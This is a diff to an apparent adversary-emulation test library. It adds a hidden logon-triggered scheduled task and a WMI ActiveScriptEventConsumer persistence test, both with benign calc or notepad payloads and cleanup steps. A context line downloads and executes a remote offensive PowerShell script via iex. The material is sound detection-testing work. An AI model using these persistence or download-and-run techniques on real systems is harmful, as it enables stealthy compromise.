diff --git a/atomics/T1053.005/T1053.005.yaml b/atomics/T1053.005/T1053.005.yaml
index 6b57de3d..95363202 100644
--- a/atomics/T1053.005/T1053.005.yaml
+++ b/atomics/T1053.005/T1053.005.yaml
@@ -164,3 +164,18 @@ atomic_tests:
       schtasks /delete /tn "ATOMIC-T1053.005" /F >nul 2>&1
       reg delete HKCU\SOFTWARE\ATOMIC-T1053.005 /F >nul 2>&1
     name: command_prompt
+- name: Import XML Schedule Task with Hidden Attribute 
+  auto_generated_guid: cd925593-fbb4-486d-8def-16cbdf944bf4
+  description: |
+    Create an scheduled task that executes calc.exe after user login from XML that contains hidden setting attribute. 
+    This technique was seen several times in tricbot malware and also with the targetted attack campaigne the industroyer2.
+  supported_platforms:
+    - windows
+  executor:
+    name: powershell
+    elevation_required: true
+    command: |
+      $xml = [System.IO.File]::ReadAllText("PathToAtomicsFolder\T1053.005\src\T1053_05_SCTASK_HIDDEN_ATTRIB.xml")
+      Invoke-CimMethod -ClassName PS_ScheduledTask -NameSpace "Root\Microsoft\Windows\TaskScheduler" -MethodName "RegisterByXml" -Arguments @{ Force = $true; Xml =$xml; }
+    cleanup_command: |
+      Unregister-ScheduledTask -TaskName "atomic red team" -confirm:$false >$null 2>&1
diff --git a/atomics/T1053.005/src/T1053_05_SCTASK_HIDDEN_ATTRIB.xml b/atomics/T1053.005/src/T1053_05_SCTASK_HIDDEN_ATTRIB.xml
new file mode 100644
index 00000000..4965b36c
--- /dev/null
+++ b/atomics/T1053.005/src/T1053_05_SCTASK_HIDDEN_ATTRIB.xml
@@ -0,0 +1,45 @@
+<?xml version="1.0" encoding="UTF-16"?>
+<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
+  <RegistrationInfo>
+    <Version>1.1.1</Version>
+    <Author>atomicredteam</Author>
+    <Description>atomic red team schedule task with hidden attribute</Description>
+    <URI>\atomic red team</URI>
+  </RegistrationInfo>
+  <Triggers>
+    <LogonTrigger>
+      <Enabled>true</Enabled>
+    </LogonTrigger>
+  </Triggers>
+  <Principals>
+    <Principal id="Author">
+      <RunLevel>LeastPrivilege</RunLevel>
+      <LogonType>InteractiveToken</LogonType>
+    </Principal>
+  </Principals>
+  <Settings>
+    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>
+    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
+    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>
+    <AllowHardTerminate>true</AllowHardTerminate>
+    <StartWhenAvailable>true</StartWhenAvailable>
+    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>
+    <IdleSettings>
+      <StopOnIdleEnd>true</StopOnIdleEnd>
+      <RestartOnIdle>false</RestartOnIdle>
+    </IdleSettings>
+    <AllowStartOnDemand>true</AllowStartOnDemand>
+    <Enabled>true</Enabled>
+    <Hidden>true</Hidden>
+    <RunOnlyIfIdle>false</RunOnlyIfIdle>
+    <WakeToRun>false</WakeToRun>
+    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>
+    <Priority>6</Priority>
+  </Settings>
+  <Actions Context="Author">
+    <Exec>
+      <Command>C:\Windows\system32\calc.exe"</Command>
+      <Arguments></Arguments>
+    </Exec>
+  </Actions>
+</Task>
diff --git a/atomics/T1087.002/T1087.002.yaml b/atomics/T1087.002/T1087.002.yaml
index ca615878..13c0e718 100644
--- a/atomics/T1087.002/T1087.002.yaml
+++ b/atomics/T1087.002/T1087.002.yaml
@@ -275,4 +275,4 @@ atomic_tests:
       $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
       iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
       generaldomaininfo -noninteractive -consoleoutput
-    name: powershell
\ No newline at end of file
+    name: powershell
diff --git a/atomics/T1546.003/T1546.003.yaml b/atomics/T1546.003/T1546.003.yaml
index 5866f515..8c365a9e 100644
--- a/atomics/T1546.003/T1546.003.yaml
+++ b/atomics/T1546.003/T1546.003.yaml
@@ -1,7 +1,7 @@
 attack_technique: T1546.003
 display_name: 'Event Triggered Execution: Windows Management Instrumentation Event Subscription'
 atomic_tests:
-- name: Persistence via WMI Event Subscription
+- name: Persistence via WMI Event Subscription - CommandLineEventConsumer
   auto_generated_guid: 3c64f177-28e2-49eb-a799-d767b24dd1e0
   description: |
     Run from an administrator powershell window. After running, reboot the victim machine.
@@ -16,13 +16,13 @@ atomic_tests:
   - windows
   executor:
     command: |
-      $FilterArgs = @{name='AtomicRedTeam-WMIPersistence-Example';
+      $FilterArgs = @{name='AtomicRedTeam-WMIPersistence-CommandLineEventConsumer-Example';
                       EventNameSpace='root\CimV2';
                       QueryLanguage="WQL";
                       Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325"};
       $Filter=New-CimInstance -Namespace root/subscription -ClassName __EventFilter -Property $FilterArgs
 
-      $ConsumerArgs = @{name='AtomicRedTeam-WMIPersistence-Example';
+      $ConsumerArgs = @{name='AtomicRedTeam-WMIPersistence-CommandLineEventConsumer-Example';
                       CommandLineTemplate="$($Env:SystemRoot)\System32\notepad.exe";}
       $Consumer=New-CimInstance -Namespace root/subscription -ClassName CommandLineEventConsumer -Property $ConsumerArgs
 
@@ -32,12 +32,53 @@ atomic_tests:
       }
       $FilterToConsumerBinding = New-CimInstance -Namespace root/subscription -ClassName __FilterToConsumerBinding -Property $FilterToConsumerArgs
     cleanup_command: |
-      $EventConsumerToCleanup = Get-WmiObject -Namespace root/subscription -Class CommandLineEventConsumer -Filter "Name = 'AtomicRedTeam-WMIPersistence-Example'"
-      $EventFilterToCleanup = Get-WmiObject -Namespace root/subscription -Class __EventFilter -Filter "Name = 'AtomicRedTeam-WMIPersistence-Example'"
+      $EventConsumerToCleanup = Get-WmiObject -Namespace root/subscription -Class CommandLineEventConsumer -Filter "Name = 'AtomicRedTeam-WMIPersistence-CommandLineEventConsumer-Example'"
+      $EventFilterToCleanup = Get-WmiObject -Namespace root/subscription -Class __EventFilter -Filter "Name = 'AtomicRedTeam-WMIPersistence-CommandLineEventConsumer-Example'"
       $FilterConsumerBindingToCleanup = Get-WmiObject -Namespace root/subscription -Query "REFERENCES OF {$($EventConsumerToCleanup.__RELPATH)} WHERE ResultClass = __FilterToConsumerBinding" -ErrorAction SilentlyContinue
       $FilterConsumerBindingToCleanup | Remove-WmiObject
       $EventConsumerToCleanup | Remove-WmiObject
       $EventFilterToCleanup | Remove-WmiObject
     name: powershell
     elevation_required: true
+- name: Persistence via WMI Event Subscription - ActiveScriptEventConsumer
+  auto_generated_guid: fecd0dfd-fb55-45fa-a10b-6250272d0832
+  description: |
+    Run from an administrator powershell window. After running, reboot the victim machine.
+    After it has been online for 4 minutes you should see notepad.exe running as SYSTEM.
 
+    Code references
+
+    https://gist.github.com/mgreen27/ef726db0baac5623dc7f76bfa0fc494c
+
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      $FilterArgs = @{name='AtomicRedTeam-WMIPersistence-ActiveScriptEventConsumer-Example';
+                      EventNameSpace='root\CimV2';
+                      QueryLanguage="WQL";
+                      Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325"};
+      $Filter=Set-WmiInstance -Class __EventFilter -Namespace "root\subscription" -Arguments $FilterArgs
+
+      $ConsumerArgs = @{name='AtomicRedTeam-WMIPersistence-ActiveScriptEventConsumer-Example';
+                      ScriptingEngine='VBScript';
+                      ScriptText='
+                      Set objws = CreateObject("Wscript.Shell")
+                      objws.Run "notepad.exe", 0, True
+                      '}
+      $Consumer=Set-WmiInstance -Namespace "root\subscription" -Class ActiveScriptEventConsumer -Arguments $ConsumerArgs
+
+      $FilterToConsumerArgs = @{
+      Filter = $Filter;
+      Consumer = $Consumer;
+      }
+      $FilterToConsumerBinding = Set-WmiInstance -Namespace 'root/subscription' -Class '__FilterToConsumerBinding' -Arguments $FilterToConsumerArgs
+    cleanup_command: |
+      $EventConsumerToCleanup = Get-WmiObject -Namespace root/subscription -Class ActiveScriptEventConsumer -Filter "Name = 'AtomicRedTeam-WMIPersistence-ActiveScriptEventConsumer-Example'"
+      $EventFilterToCleanup = Get-WmiObject -Namespace root/subscription -Class __EventFilter -Filter "Name = 'AtomicRedTeam-WMIPersistence-ActiveScriptEventConsumer-Example'"
+      $FilterConsumerBindingToCleanup = Get-WmiObject -Namespace root/subscription -Query "REFERENCES OF {$($EventConsumerToCleanup.__RELPATH)} WHERE ResultClass = __FilterToConsumerBinding" -ErrorAction SilentlyContinue
+      $FilterConsumerBindingToCleanup | Remove-WmiObject
+      $EventConsumerToCleanup | Remove-WmiObject
+      $EventFilterToCleanup | Remove-WmiObject
+    name: powershell
+    elevation_required: true
\ No newline at end of file
diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt
index f08b0f48..803f4e09 100644
--- a/atomics/used_guids.txt
+++ b/atomics/used_guids.txt
@@ -1060,3 +1060,5 @@ ed0335ac-0354-400c-8148-f6151d20035a
 82a9f001-94c5-495e-9ed5-f530dbded5e2
 f3a10056-0160-4785-8744-d9bd7c12dc39
 6c499943-b098-4bc6-8d38-0956fc182984
+fecd0dfd-fb55-45fa-a10b-6250272d0832
+cd925593-fbb4-486d-8def-16cbdf944bf4